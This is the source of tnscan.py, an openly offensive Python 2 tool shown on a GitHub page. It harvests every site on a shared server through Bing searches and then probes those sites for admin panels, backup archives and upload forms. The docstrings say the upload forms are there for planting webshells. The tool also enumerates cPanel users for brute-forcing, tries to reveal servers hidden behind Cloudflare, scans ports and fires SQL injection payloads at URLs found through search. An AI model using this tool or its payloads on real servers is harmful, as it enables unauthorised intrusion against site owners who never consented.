-
Notifications
You must be signed in to change notification settings - Fork 4
/
tnscan.py
406 lines (379 loc) · 19.2 KB
/
tnscan.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
#!/usr/bin/env python2
# >>> Bism Allah <<<
# Code Name : TNscan v1.0
# Coder : MatriX Coder (17 yo guy from Tunisia)
# Blog : www.matrixcoder.co.vu
# Twitter : MatriX_Coder
# Pastebin : www.pastebin.com/u/matrixcoder
# this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
# Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
# greats also to tunisia fallega team and to madleets team and to you !
# Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz
import re, urllib2, urllib, os, socket, sys
from platform import system
logo = """
\t _____ _ _
\t|_ _| \ | |
\t | | | \| |___ ___ __ _ _ __
\t | | | . ` / __|/ __/ _` | '_ \
\t | | | |\ \__ \ (_| (_| | | | |
\t \_/ \_| \_/___/\___\__,_|_| |_| v1.0
"""
menu = """
1) Get all websites
2) Get joomla websites
3) Get wordpress websites
4) Find control panel
5) Find zip files
6) Find upload files
7) Get server users
8) Scan from SQL injection
9) Crawl and scan from SQL injection (soon)
10) Scan ports (range of ports)
11) Scan ports (common ports )
12) Get server banner
13) Bypass Cloudflare
14) About !
99) Exit
"""
def unique(seq):
"""
get unique from list found it on stackoverflow
"""
seen = set()
return [seen.add(x) or x for x in seq if x not in seen]
def clearScr() :
"""
clear the screen in case of GNU/Linux or
windows
"""
if system() == 'Linux':
os.system('clear')
if system() == 'Windows':
os.system('cls')
class TNscan :
def __init__(self, serverip) :
self.serverip = serverip
self.getSites(False)
print menu
while True :
choice = raw_input(' Enter choice -> ')
if choice == '1' :
self.getSites(True)
elif choice == '2' :
self.getJoomla()
elif choice == '3' :
self.getWordpress()
elif choice == '4' :
self.findPanels()
elif choice == '5' :
self.findZip()
elif choice == '6' :
self.findUp()
elif choice == '7' :
self.getUsers()
elif choice == '8' :
self.grabSqli()
elif choice == '10' :
ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
self.portScanner(1, ran)
elif choice == '11' :
self.portScanner(2, None)
elif choice == '12' :
self.getServerBanner()
elif choice == '13' :
self.cloudflareBypasser()
elif choice == '14' :
self.aboutME()
elif choice == '99' :
print ' Goodbye'
exit()
con = raw_input(' Continue [Y/n] -> ')
if con[0].upper() == 'N' :
exit()
else :
clearScr()
print logo
print menu
def aboutME(self) :
clearScr()
print """
>>> Bism Allah <<<
Code Name : TNscan v1.0
Coder : MatriX Coder (17 yo guy from Tunisia)
Blog : www.matrixcoder.co.vu
Twitter : MatriX_Coder
Pastebin : www.pastebin.com/u/matrixcoder
this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
greats also to tunisian fallega team, to madleets team and to you !
Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz
"""
def getSites(self, a) :
"""
get all websites on same server
from bing search
"""
lista = []
page = 1
while page <= 101:
try:
bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page)
openbing = urllib2.urlopen(bing)
readbing = openbing.read()
findwebs = re.findall('<h2><a href="(.*?)"', readbing)
for i in range(len(findwebs)):
allnoclean = findwebs[i]
findall1 = re.findall('http://(.*?)/', allnoclean)
for idx, item in enumerate(findall1):
if 'www' not in item:
findall1[idx] = 'http://www.' + item + '/'
else:
findall1[idx] = 'http://' + item + '/'
lista.extend(findall1)
page += 50
except urllib2.URLError:
pass
self.sites = unique(lista)
if a :
clearScr()
print '[*] Found ', len(lista), ' Website\n'
for site in self.sites :
print site
def getWordpress(self) :
"""
get wordpress site using a dork the attacker
may do a password list attack (i did a tool for that purpose check my pastebin)
or scan for common vulnerabilities using wpscan for example (i did a simple tool
for multi scanning using wpscan)
"""
lista = []
page = 1
while page <= 101:
try:
bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+?page_id=&count=50&first=" + str(page)
openbing = urllib2.urlopen(bing)
readbing = openbing.read()
findwebs = re.findall('<h2><a href="(.*?)"', readbing)
for i in range(len(findwebs)):
wpnoclean = findwebs[i]
findwp = re.findall('(.*?)\?page_id=', wpnoclean)
lista.extend(findwp)
page += 50
except:
pass
lista = unique(lista)
clearScr()
print '[*] Found ', len(lista), ' Wordpress Website\n'
for site in lista :
print site
def getJoomla(self) :
"""
get all joomla websites using
bing search the attacker may bruteforce
or scan them
"""
lista = []
page = 1
while page <= 101:
bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+index.php?option=com&count=50&first=" + str(page)
openbing = urllib2.urlopen(bing)
readbing = openbing.read()
findwebs = re.findall('<h2><a href="(.*?)"', readbing)
for i in range(len(findwebs)):
jmnoclean = findwebs[i]
findjm = re.findall('(.*?)index.php', jmnoclean)
lista.extend(findjm)
page += 50
lista = unique(lista)
clearScr()
print '[*] Found ', len(lista), ' Joomla Website\n'
for site in lista :
print site
def findPanels(self) :
"""
find panels from grabbed websites
the attacker may do a lot of vulnerabilty
tests on the admin area
"""
adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site']
clearScr()
for site in self.sites :
for admin in adminList :
if urllib.urlopen(site + admin).getcode() == 200 :
print " [*] Found admin panel -> ", site + admin
def findZip(self) :
"""
find zip files from grabbed websites
it may contain useful informations
"""
zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
clearScr()
for site in self.sites :
for zip1 in zipList :
if urllib.urlopen(site + zip1).getcode() == 200 :
print " [*] Found zip file -> ", site + zip1
def findUp(self) :
"""
find upload forms from grabbed
websites the attacker may succeed to
upload malicious files like webshells
"""
upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
clearScr()
for site in self.sites :
for up in upList :
if (urllib.urlopen(site + up).getcode() == 200) :
html = urllib.urlopen(site + up).readlines()
for line in html :
if re.findall('type=file', line) :
print " [*] Found upload -> ", site+up
def getUsers(self) :
"""
get server users using a method found by
iranian hackers i think, the attacker may
do a bruteforce attack on CPanel, ssh, ftp or
even mysql if it supports remote login
(you can use medusa or hydra)
"""
userslist = []
for site in self.sites :
try:
site = site.replace('http://www.', '')
site = site.replace('http://', '')
site = site.replace('.', '')
if '-' in site:
site = site.replace('-', '')
site = site.replace('/', '')
while len(site) > 2:
resp = urllib2.urlopen(site + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
if 'invalid username' not in resp.lower():
print '\t [*] Found -> ', site
userslist.append(site)
else :
print site
site = site[:-1]
clearScr()
for user in userlist :
print user
except:
pass
def cloudflareBypasser(self) :
"""
trys to bypass cloudflare i already wrote
in my blog how it works, i learned this
method from a guy in madleets
"""
clearScr()
subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
for site in self.sites :
site.replace('http://', '')
site.replace('/', '')
try:
ip = socket.gethostbyname(site)
except socket.error:
pass
for sub in subdoms:
doo = sub + '.' + site
print ' [~] Trying -> ', doo
try:
ddd = socket.gethostbyname(doo)
if ddd != ip:
print ' [*] Cloudflare bypassed -> ', ddd
break
except socket.error :
pass
def getServerBanner(self) :
"""
simply gets the server banner
the attacker may benefit from it
like getting the server side software
"""
clearScr()
try:
s = 'http://' + self.serverip
httpresponse = urllib.urlopen(s)
print ' [*] Server header -> ', httpresponse.headers.getheader('server')
except:
pass
def grabSqli(self) :
"""
just grabs all websites in server with php?id= dork
for scanning for error based sql injection
"""
page = 1
lista = []
while page <= 101:
try:
bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page)
openbing = urllib2.urlopen(bing)
readbing = openbing.read()
findwebs = re.findall('<h2><a href="(.*?)"', readbing)
for i in range(len(findwebs)):
x = findwebs[i]
lista.append(x)
except:
pass
page += 50
lista = unique(lista)
self.checkSqli(lista)
def checkSqli(self, s):
"""
checks for error based sql injection,
most of the codes here are from webpwn3r
project the one who has found an lfi in
yahoo as i remember, you can find a separate
tool in my blog
"""
clearScr()
payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
for url in s:
try:
for param in url.split('?')[1].split('&'):
for payload in payloads:
power = url.replace(param, param + payload.strip())
#print power
html = urllib2.urlopen(power).readlines()
for line in html:
checker = re.findall(check, line)
if len(checker) != 0 :
print ' [*] SQLi found -> ', power
except:
pass
def crawlSqli(self) :
"""
simple crawling using chilkat (yeah chilkat sucks)
and scan for error based sql injection
[!] will be on the next version
"""
pass
def portScanner(self, mode, ran) :
"""
simple port scanner works with range of ports
or with common ports (al-swisre idea)
"""
clearScr()
def do_it(ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#sock.settimeout(5)
sock = sock.connect_ex((ip,port))
if sock == 0:
print " [*] Port %i is open" % port
if mode == 1 :
a = ran.split('-')
start = int(a[0])
end = int(a[1])
for i in range(start, end):
do_it(self.serverip, i)
elif mode == 2 :
for port in [80,21,22,2082,25,53,110,443,143] :
# didn't use multithreading cos it's few ports
do_it(self.serverip, port)
if __name__ == '__main__' :
try :
clearScr()
print logo
TNscan(sys.argv[1])
except IndexError :
print " [*] Usage : python "+sys.argv[0]+" 127.0.0.1"